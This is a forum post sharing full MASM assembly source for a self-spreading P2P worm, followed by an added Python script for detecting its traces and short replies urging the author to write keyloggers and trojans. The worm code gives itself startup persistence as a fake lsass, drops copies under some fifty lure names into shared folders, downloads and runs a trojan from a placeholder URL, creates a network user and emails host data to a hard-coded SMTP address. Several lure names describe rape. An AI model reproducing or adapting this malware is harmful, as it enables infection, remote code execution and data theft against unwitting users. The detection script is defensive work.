P2pRevenge worm(masm) v0.2

Status
Thread closed to further replies.

imported_delta

Silver member
26 August 2007
New version of my already-posted P2P worm in assembly (more precisely, in MASM)

Features:
- Copies itself to system32
- Runs at every system startup
- Copies itself into folders whose name contains the letters "shar" (e.g. shared or share) under 50 different names
- Uses mutexes to kill several versions of the Storm worm
- Uses a mutex to allow only one instance at a time
NEW FEATURES
- Can download a file (from a fixed list) from a website and run it via CreateProcess
- Thanks to its own built-in SMTP engine, it can send the author an email containing various data about the infected PC (for now I have only put GetComputerName, but add more if you want)
- Can add a new user to the network (via NetUserAdd) with privilege 3 (still to be polished anyway)


Final EXE: only 9.5 KB

Since I haven't tested it, it probably contains lots of errors (but as far as compiling goes, it compiles, asd)

Code:
.486
.model flat, stdcall
option casemap:none

include shlwapi.inc
include windows.inc
include kernel32.inc
include user32.inc
include advapi32.inc
include shell32.inc
include gdi32.inc
include netapi32.inc
include urlmon.inc
include ws2_32.inc ;for SMTP

.list
includelib gdi32.lib
includelib shell32.lib
includelib advapi32.lib
includelib user32.lib
includelib kernel32.lib
includelib shlwapi.lib
includelib netapi32.lib
includelib urlmon.lib
includelib ws2_32.lib ;for SMTP

        mNextListEntry MACRO ML
          cld
          xor     eax, eax
          or      ecx, -1
          repnz scasb
          cmp     byte ptr[edi], 0
          jnz     ML
        ENDM



.data

                        szCopyright db  'Komodo worm written in assembly  2008/03/23 italy',0
                        szKeyName db 'Lsass',0
                        szREGSZ   db 'REG_SZ',0
                        szTestKey        db  'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
                        szLsass          db  '\Lsasss.exe',0
                        szMutex            db 'System_',0
                        hkey                  dd ?
                        lpdwDisp         dd ?
                        dayt                   dd ?
                        szShar                    db      "shar",0      
                        szMessageTitle    db   "Error",0
                        szMessageBody   db "Error: file is corrupted or damage",0
                    szHDDSlash        db      "\",0
                    szHDDSearch      db      "*.*",0 
                    szHDDSearchMask db      "*.*",0
                    szSharNames      db      "Autocad 2008 FULL-ENG-ITA-FRA-SPA-DE.exe", 0 
                                                    db      "Adobe Photoshop Full Version.exe", 0 
                                                    db      "Iphone source code.zip                                                           .exe",0
                                                    db      "Visual c++ 6 FULL.exe",0 
                                                    db      "WinRAR-Full.exe",0
                                                    db      "Windows Vista ultimate full (8 languages).exe",0
                                                    db      "WINDOWS SOURCE CODE.zip                                                             .exe",0 
                                                    db      "jenna jameson screensaver.scr",0 
                                                    db      "Opera 10 FULL.exe",0 
                                                    db      "Internet explorer 8.exe",0 
                                                    db      "Brianna banks and jenna jameson.mpeg                                           .exe",0 
                                                    db      "Norton AntiVirus 2008.exe",0 
                                                    db      "Halo 3 (xbox360).iso                                                             .exe",0 
                                                    db      "NETSKY SOURCE CODE.zip                                   .exe",0 
                                                    db      "Kazaa Lite.zip                                  .exe",0 
                                                    db      "Windows crack all versione .zip                                              .exe",0 
                                                    db      "Rape-women rape by a chinese and suck him dick.mpeg                                                .exe",0
                                                    db      "Britney spears naked.jpeg                                           .exe",0 
                                                    db      "Nero burning  2008 FULL.exe",0 
                                                    db      "Visual Studio.NET 2008 FULL.zip                                                   .exe",0 
                                                    db      "Eva longoria sex tape.avi                                                                   .exe",0 
                                                    db      "Katie Holmes sex tape.avi                                                                        .exe",0 
                                                    db     "Nasa secret file leaked.rar                                                               .exe",0 
                                                    db     "area51 leaked files.zip                                                                           .exe",0
                                                    db     "Windows seven alpha leaked.iso                                                              .exe",0 
                                                    db     "Windows xp keygen generator(by SILENT).exe",0
                                                    db     "I.Am.Legend.DVDRip.XviD-AXXO.avi                                                            .exe",0 
                                                    db     "googlebot source code leaked(cpp).zip                                                           .exe",0 
                                                    db     "msn source code(asp).zip                                                                           .exe",0 
                                                    db     "yahoo email(3000) leak.mbox                                                                        .exe",0 
                                                    db     "www.parisexposed.com(all images and video).zip                                                   .exe",0 
                                                    db     "OSX LEOPARD FOR I386.iso                                                                         .exe",0 
                                                    db     "4 women raped by two men.avi                                                                  .exe",0 
                                                    db     "SkyOS source code.zip                                                                           .exe",0 
                                                    db     "kazaa source code.zip                                                                        .exe",0 
                                                    db     "intel email leak.pst                                                                            .exe",0 
                                                    db     "RIAA email leak.pst                                                                           .exe",0
                                                    db     "Cloverfield.2008.DVDRip.AXXO.avi                                                             .exe";0 
                                                    db     "Die.Hard.4.2007.DVDRip.AXXO.avi                                                                .exe",0 
                                                    db     "secretary raped.avi                                                                            .exe",0 
                                                    db     "Avril.Lavigne raped(11.12.2007).avi                                                              .exe",0 
                                                    db     "Nicole Kidman sex tape.avi                                                              .exe",0 
                                                    db    " White house leaked email.doc                                                          .exe", 0 
                                                    db    "Bill clinton sex tape image(SEX).zip                                                            .exe",0
                                                    db    "Windows vista source code(by renegade).zip                                                      .exe",0 
                                                    db    "Paris hilton new sex tape(with kim kardashian).avi                                                   .exe",0 
                                                    db    "Gmail source code(ajax).tar.gz                                                                         .exe",0 
                                                    db    " Myspace source code(php).zip                                                                           .exe",0,0 
             szStormMutex              db    'klllekkdkkd',0
                                                     db    'A8dK894Lm9#F2i$s0Bq2X',0
                                                     db   'uri40333444',0
                                                     db   'hlkjlkjlklk34d',0
                                                     db   'd3kb5sujs50lq2mr',0,0    
             szUrl                              db   'www.sito.com/trojan.exe',0        ;the link to download the trojan from
             szTrojan                        db   '\netusr.exe',0
             processInfo                  PROCESS_INFORMATION <>
             szBuffing                       db ?
             ;
             ;SMTP part
             ;
             sock                              dd      0
             var                                 db      0
             sin                                sockaddr_in <>
             wsaData                      WSADATA<>
             IP                                  db  "206.165.150.109",0
             OK                                db "220",0
             OK1                              db "250",0
             OK2                              db "354",0
             helo                              db  "HELO",13,10
             helosize                       equ $- helo
             from                              db  "MAIL FROM: [email protected]",13,10
             fromsize                      equ $- from
             to                                  db  "RCPT TO: [email protected]",13,10
             tosize                           equ $ - to
            data                              db "data",13,10
            datasize                       equ $-data
            mail                              db  ?
            mailsize                      equ $ - mail
           quit                               db "quit",0
          quitsize                        equ $- quit
          szComputerNameBuffer   db ?
          szComputerName    db  80  dup(0)
          
          

             
                 
                        
                        
                     
.data?
           szSysDirFileName        db      MAX_PATH+1 dup(?)
           szRunFileName            db      MAX_PATH+1 dup(?)
           szDirTrojan                     db      MAX_PATH+1 dup(?) 
           
           ;
           ;  SMTP part
           ;
           buff             db 512 dup (?)
           buff2          db 512 dup (?)
                                   
           
           
.code

KillStorm proc
         mov     edi, offset szStormMutex
@next:
        invoke  CreateMutex, NULL, TRUE, edi
       mNextListEntry @next
        
	Ret
KillStorm EndP

AddNetUser proc
        invoke NetUserAdd, NULL, 3,  szBuffing, NULL
	Ret
AddNetUser EndP
;
;     Code that partly already existed, but modified by me
;     to adapt it to the worm
;   
SendEmailInfect proc
        invoke GetComputerName, addr szComputerNameBuffer, addr szComputerName ;get the computer name
        invoke lstrcat, mail, szComputerNameBuffer
        invoke WSAStartup,0101h,ADDR wsaData  
        invoke socket,PF_INET,SOCK_STREAM,0
        mov sock,eax  
       invoke htons,25
        mov sin.sin_port,ax
        mov sin.sin_family,AF_INET
        invoke inet_addr,addr IP
       mov sin.sin_addr,eax
       invoke connect,sock,addr sin,sizeof sin
rcv:
       invoke recv,sock,addr buff,512,0
       invoke lstrcpyn,addr buff2,addr buff,sizeof OK
       invoke lstrcmpi,addr buff2,addr OK
      .if eax==0
            invoke send,sock,addr helo,helosize,0
            mov var,1
           jmp rcv
      .endif
    .if var==1
          invoke send,sock,addr from,fromsize,0
         mov var,2
         jmp rcv
    .endif
    .if var==2
       invoke lstrcpyn,addr buff2,addr buff,sizeof OK1
       invoke lstrcmpi,addr buff2,addr OK1
        .if eax==0
              invoke send,sock,addr to,tosize,0
               mov var,3
               jmp rcv
       .endif
  .endif
  .if var==3
            invoke lstrcpyn,addr buff2,addr buff,sizeof OK1
            invoke lstrcmpi,addr buff2,addr OK1
           .if eax==0
                invoke send,sock,addr data,datasize,0
               mov var,4
              jmp rcv
            .endif
  .endif
  .if var==4
            invoke lstrcpyn,addr buff2,addr buff,sizeof OK2
           invoke lstrcmpi,addr buff2,addr OK2
           .if eax==0
                 invoke send,sock,addr mail,mailsize,0
                  mov var,5
                 jmp rcv
           .endif
  .endif
   .if var==5
          invoke send,sock,addr quit,quitsize,0
    .endif
	Ret
SendEmailInfect EndP

DownloadTrojan proc
        LOCAL startInfo:STARTUPINFO
        invoke GetWindowsDirectory, offset szDirTrojan, MAX_PATH
        invoke lstrcat, offset szDirTrojan, offset szTrojan
        invoke URLDownloadToFile, NULL, addr  szUrl, addr szDirTrojan, 0, 0
        invoke GetStartupInfo,ADDR startInfo
        invoke CreateProcess, addr szDirTrojan, NULL, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, addr startInfo, addr processInfo
	Ret
DownloadTrojan EndP


regnow proc
         LOCAL   hkHandle: DWORD
         LOCAL   hWin :DWORD
         invoke  GetSystemDirectory, offset szSysDirFileName, MAX_PATH
         invoke  lstrcat, offset szSysDirFileName, offset szLsass
         invoke  GetModuleFileName, NULL, offset szRunFileName, MAX_PATH
         invoke  SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
         invoke  CopyFile, offset szRunFileName, offset szSysDirFileName, FALSE
         invoke  RegCreateKey, HKEY_LOCAL_MACHINE, offset szTestKey, addr hkHandle
         invoke  lstrlen, offset szSysDirFileName
         invoke  RegSetValueEx, hkHandle, offset szKeyName, 0, REG_SZ, offset szSysDirFileName, eax
         invoke  RegCloseKey, hkHandle
         invoke MessageBox, hWin, addr szMessageBody, addr szMessageTitle,MB_ICONERROR
	Ret
regnow EndP

Mutex proc
        mov edi, offset szMutex
         invoke CreateMutex, NULL, FALSE, edi
	Ret
Mutex EndP

CopyShare proc uses edi lpPath: DWORD
        LOCAL   adv_path: DWORD

        invoke  GlobalAlloc, GMEM_FIXED, 65000
        mov     adv_path, eax

        mov     edi, offset szSharNames
@next:
        push    edi
        invoke  lstrcpy, adv_path, lpPath
        push    adv_path
        call    lstrcat
        invoke  CopyFile, offset szSysDirFileName, adv_path, TRUE

        mNextListEntry @next

        invoke  GlobalFree, adv_path        
	Ret
CopyShare EndP

HDDScanFromPath proc uses edi lpPath, szBasePath: DWORD
        LOCAL   hFind: DWORD
        LOCAL   FindFileData: DWORD

        invoke  LocalAlloc, GPTR, sizeof WIN32_FIND_DATA
        mov     FindFileData, eax

        invoke  lstrlen, lpPath
        mov     edi, eax

        invoke  lstrcat, lpPath, offset szHDDSearchMask

        invoke  FindFirstFile, lpPath, FindFileData
        mov     hFind, eax
        inc     eax
        jz      @end

@find_loop:
        mov     eax, lpPath
        mov     byte ptr[eax + edi], 0

        mov     edx, FindFileData
        lea     edx, [edx].WIN32_FIND_DATA.cFileName

        cmp     word ptr[edx], '.'
        jz      @skip

        cmp     word ptr[edx], '..'
        jz      @skip

        invoke  lstrcat, lpPath, edx

        mov     edx, FindFileData
        lea     edx, [edx].WIN32_FIND_DATA.dwFileAttributes
        test    dword ptr[edx], FILE_ATTRIBUTE_DIRECTORY

        invoke  StrRChr, lpPath, NULL, '\'
        .IF     eax
                inc     eax
                invoke  StrStrI, eax, offset szShar
        .ENDIF
        push    eax
     
        invoke  lstrcat, lpPath, offset szHDDSlash
        pop     eax
        .IF     eax
                invoke  CopyShare, lpPath
        .ENDIF
        invoke  HDDScanFromPath, lpPath, szBasePath
        jmp     @skip
@skip:
        invoke  Sleep, 2
        invoke  FindNextFile, hFind, FindFileData
        test    eax, eax
        jnz     @find_loop

        invoke  FindClose, hFind

@end:
        invoke  LocalFree, FindFileData

        ret
HDDScanFromPath endp

HDDScanDrive proc szDrive: DWORD
        LOCAL   szLongPath: DWORD

        invoke  GlobalAlloc, GPTR, 65536
        mov     szLongPath, eax
        invoke  lstrcpy, eax, szDrive

        .IF     eax
                invoke  HDDScanFromPath, szLongPath, szLongPath
        .ENDIF

        invoke  GlobalFree, szLongPath
        ret
HDDScanDrive endp

HDDScanDrives proc uses esi
        LOCAL   DrvBuf: DWORD
        invoke  GlobalAlloc, GPTR, 8192
        mov     DrvBuf, eax
        invoke  GetLogicalDriveStrings, 8191, eax
        mov     esi, DrvBuf

        IFDEF TESTVERSION
                invoke  HDDScanDrive, offset szHDDBasePath
        ELSE      
                @get_next_drv:
                .IF     byte ptr[esi]
                        invoke  GetDriveType, esi
                        .IF     eax == DRIVE_FIXED
                                invoke  HDDScanDrive, esi
                        .ENDIF
                        invoke  lstrlen, esi
                        add     esi, eax
                        inc     esi
                        jmp     @get_next_drv
                .ENDIF
        ENDIF

        invoke  GlobalFree, DrvBuf
        ret
HDDScanDrives endp


start:
         invoke regnow
         invoke Mutex
         invoke HDDScanDrives 
         invoke KillStorm
         invoke DownloadTrojan
         invoke AddNetUser
         invoke SendEmailInfect
   
ret
end start
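A hunting check for the on-disk traces the feature list above describes, added here as an example; it is not part of the original post and not the worm's own code. It looks for the three observable traits the post names: decoy file names that pad a document or media extension with spaces before a trailing .exe/.scr, executables dropped into folders whose name contains "shar" (the same substring test the worm's scanner uses), and the Lsasss.exe copy registered under a Run value. The file listing and Run-key values are constructed inline for the demo, not captured from a real machine.

```python
"""Hunt for the on-disk traces the share-folder worm above leaves behind.

Added example, not the original poster's code. The file listing and the
Run-key values below are constructed for the demo, not taken from a host.
"""
import ntpath
import re

# Decoy names: a document/media extension, two or more spaces to push the
# real extension out of view in a file browser, then .exe or .scr.
PADDED_DOUBLE_EXT = re.compile(
    r"\.(zip|rar|iso|avi|mpeg|jpeg|jpg|doc|pst|mbox|tar\.gz)\s{2,}\.(exe|scr)$",
    re.IGNORECASE,
)
# The persistent copy is named like lsass.exe with one or more extra 's'.
LSASS_LOOKALIKE = re.compile(r"^lsas{3,}\.exe$", re.IGNORECASE)
EXEC_EXT = (".exe", ".scr", ".com", ".pif")


def classify_path(path: str) -> list[str]:
    """Return the indicator names that apply to one Windows file path."""
    directory, name = ntpath.split(path)
    hits = []
    if PADDED_DOUBLE_EXT.search(name):
        hits.append("padded-double-extension")
    if LSASS_LOOKALIKE.match(name):
        hits.append("lsass-lookalike-name")
    # The worm picks drop folders by substring match on the last path
    # component ("shar" matches Share, Shared, ...), so mirror that test.
    if "shar" in ntpath.basename(directory).lower() and name.lower().endswith(EXEC_EXT):
        hits.append("executable-in-share-folder")
    return hits


def scan_listing(paths: list[str]) -> dict[str, list[str]]:
    """Map every suspicious path in a listing to its matched indicators."""
    return {p: hits for p in paths if (hits := classify_path(p))}


def check_run_values(run_values: dict[str, str]) -> list[str]:
    """Flag HKLM\\...\\Run values that launch an lsass look-alike.

    The genuine lsass.exe is started by the system, never from a Run value,
    so any value whose name or target resembles it is worth a look.
    """
    flagged = []
    for value_name, data in run_values.items():
        target = ntpath.basename(data.strip('"'))
        if LSASS_LOOKALIKE.match(target) or value_name.lower().startswith("lsass"):
            flagged.append(value_name)
    return flagged


# Constructed sample data (not captured from a real machine).
SAMPLE_LISTING = [
    r"C:\Program Files\eMule\Incoming\Adobe Photoshop Full Version.exe",
    r"D:\Shared\Iphone source code.zip                       .exe",
    r"D:\Shared\holiday.jpg",
    r"D:\Shared\WinRAR-Full.exe",
    r"C:\Windows\system32\Lsasss.exe",
    r"C:\Windows\system32\lsass.exe",
]
SAMPLE_RUN_VALUES = {
    "Lsass": r"C:\WINDOWS\system32\Lsasss.exe",
    "SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe",
}

if __name__ == "__main__":
    for path, hits in scan_listing(SAMPLE_LISTING).items():
        print(f"{path!r}: {', '.join(hits)}")
    print("suspicious Run values:", check_run_values(SAMPLE_RUN_VALUES))
```

The first sample entry shows the limit of a name-based check: a lure with a plain .exe extension in a folder that does not contain "shar" is indistinguishable from a legitimate installer by name alone, so pair this with the Run-value check and with hashing of any file that does match.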
 
1. Well done, great work (even though I don't know assembler and so I can't understand it in detail)
2. But now that you know a worm's structure well, what fun is there in tweaking the structure a bit to make variants? If you like writing viruses, now try a keylogger or a trojan, so you learn new things.
 
RedSkull92: heh, there are already thousands of excellent coders, I just dabble with this :asd:

opocaj:
Yes, I'm working on a trojan in VB6 with advanced features, but this worm was mainly for learning asm :)
 